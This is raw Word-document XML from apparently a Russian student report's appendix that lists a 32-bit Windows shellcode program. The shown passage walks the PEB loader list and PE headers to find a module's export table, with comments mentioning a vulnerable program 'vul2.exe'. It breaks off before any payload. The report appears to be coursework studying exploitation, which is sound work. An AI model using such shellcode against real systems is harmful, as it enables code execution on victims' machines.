            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>байт</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>.")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3DBDDA3F" w14:textId="77777777" w:rsidR="00C52126" w:rsidRDefault="00C52126" w:rsidP="00401C70">
            <w:pPr>
              <w:pStyle w:val="af1"/>
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3CD62396" w14:textId="74944C5C" w:rsidR="00401C70" w:rsidRDefault="00401C70" w:rsidP="00656D19">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="784256A3" w14:textId="77777777" w:rsidR="00401C70" w:rsidRDefault="00401C70">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="365BA34B" w14:textId="33EFD97A" w:rsidR="00656D19" w:rsidRDefault="00401C70" w:rsidP="00401C70">
      <w:pPr>
        <w:pStyle w:val="affff1"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Приложение Б</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D098D70" w14:textId="6A1428D0" w:rsidR="0018105F" w:rsidRDefault="0018105F" w:rsidP="0018105F">
      <w:pPr>
        <w:pStyle w:val="affffd"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>Листинг программы «Шелл-код»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1C70" w14:paraId="60615A43" w14:textId="77777777" w:rsidTr="00401C70">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9345" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="318ECA5B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[BITS 32]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4DF5E617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6D88E2CF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start:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="377212F7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xor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 xml:space="preserve">             </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E4E59A2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mov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>, [</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>fs:eax</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve"> + 30h]  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0ED175C5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149FB8D9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>  typedef struct _PEB {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E830BBD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BYTE                          Reserved1[2]; 2 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>бйта</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="14662043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>BYTE                          </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>BeingDebugged</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>; 1 байт</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CF07292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BYTE                          Reserved2[1]; 2 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>байта</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="1F6828C7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proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00E748AD">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve">;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gramEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>PVOID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Reserved</w:t>
            </w:r>
            <w:r w:rsidRPr="00E748AD">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve">3[2]; 8 </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00E748AD">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve">байт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>потому</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00E748AD">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> что указатель * 2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79F116AF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PPEB_LDR_DATA                 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>Ldr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="310020DA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mov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>, [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 xml:space="preserve"> + 0Ch]     </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6CF9069C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>  typedef struct _PEB_LDR_DATA {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="287F9073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>BYTE       Reserved1[8</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>];</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="40D55655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>PVOID      Reserved2[3</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>];</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="535DCA74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LIST_ENTRY </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>InMemoryOrderModuleList</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve">; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>вот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это</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="502C9A3C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>; }</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve"> PEB_LDR_DATA, *PPEB_LDR_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>DATA;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="5A25BE52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mov </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>esi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>, [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 xml:space="preserve"> + 14h]    </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75033769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1771BF5E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lodsd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve">                  </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve">  ;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>vul2.exe  Load</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve"> String Doubleword, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>относится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только</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve"> к </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>esi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данные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кладет</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve"> в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</w:p>
          <w:p w14:paraId="01C73552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xchg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esi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve">           </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="525538CB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lodsd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve">                   </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A70B1D2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40628940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mov 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18105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>, [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 xml:space="preserve"> + 10h]     </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F382C6D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490D12B6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; typedef struct _IMAGE_DOS_HEADER </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>{  </w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve">    DOS .EXE header</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1593A40A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WORD   </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>e_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>magic</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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>                   Magic number (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>буквы</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve"> "MZ")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C08D7E4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WORD   </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>e_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>cblp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve">                     </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A4F31E0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;      ...</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B39355E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LONG   </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>e_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>lfanew</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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               &lt;- </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>Смещение</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve">: 0x3C (60 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>байт</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4CC12C91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>; }</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve"> IMAGE_DOS_HEADER, *PIMAGE_DOS_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>HEADER;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="29D79337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4E3764F8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mov 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18105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>, [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18105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve"> + 3Ch] </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E295C94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add 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18105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve">         </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53D1757A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2594AFC0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>;typedef</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve"> struct _IMAGE_NT_HEADERS {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="542717D7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DWORD </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve">Signature;   </w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve">                         4 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>байта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сигнатура</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve"> "PE\0\0"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7ACA6AB2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IMAGE_FILE_HEADER </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>FileHeader</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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           20 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>байт</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="426C1577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IMAGE_OPTIONAL_HEADER32 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>OptionalHeader</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>нужно</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve"> в </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>этом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поле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найти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массив</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve"> с </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>данными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директории</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="47805829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>; }</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve"> IMAGE_NT_HEADERS32, *PIMAGE_NT_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>HEADERS32;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="21C3063F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; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>попадаем</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51D36133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3544B1DA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; typedef struct _IMAGE_OPTIONAL_HEADER {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2767C73F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WORD                 </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>Magic;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="53538790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BYTE                 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>MajorLinkerVersion</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="46848AAF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BYTE                 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>MinorLinkerVersion</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="65C94093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; ....</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74BF41E8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IMAGE_DATA_DIRECTORY </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>DataDirectory</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve">IMAGE_NUMBEROF_DIRECTORY_ENTRIES]; &lt;- 96 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>байт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до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этого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поля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причем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нулевой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элемент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массива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это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таблица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экспорта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поэтому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чтобы</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve"> в </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>нее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попасть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просто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смещение</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve"> 0x78</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="685060CF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>; }</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve"> IMAGE_OPTIONAL_HEADER32, *PIMAGE_OPTIONAL_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>HEADER32;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="6E9EC508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5BF9A9F5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; typedef struct _IMAGE_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>DATA</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>DIRECTORY {</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="13FA0522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DWORD </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>VirtualAddress</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve">; RVA </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>адрес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хранит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таблицу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экспорта</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve">!!! </w:t>
            </w:r>
            <w:r w:rsidRPr="00E748AD">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve">именно нулевой индекс в массиве </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>DataDirectory</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="79A396C1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lastRenderedPageBreak/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DWORD </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>Size;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="13DB6D2A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>; }</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve"> IMAGE_DATA_DIRECTORY, *PIMAGE_DATA_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>DIRECTORY;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="63F7B242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307E6B30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mov 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18105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>, [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18105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve"> + 78h] </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7CE2E8C6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add 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18105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve">         </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2808FA0E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; typedef struct _IMAGE_EXPORT_DIRECTORY {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B6DA3F4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DWORD   </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve">Characteristics;   </w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>    0x00</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3837C2AC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DWORD   </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
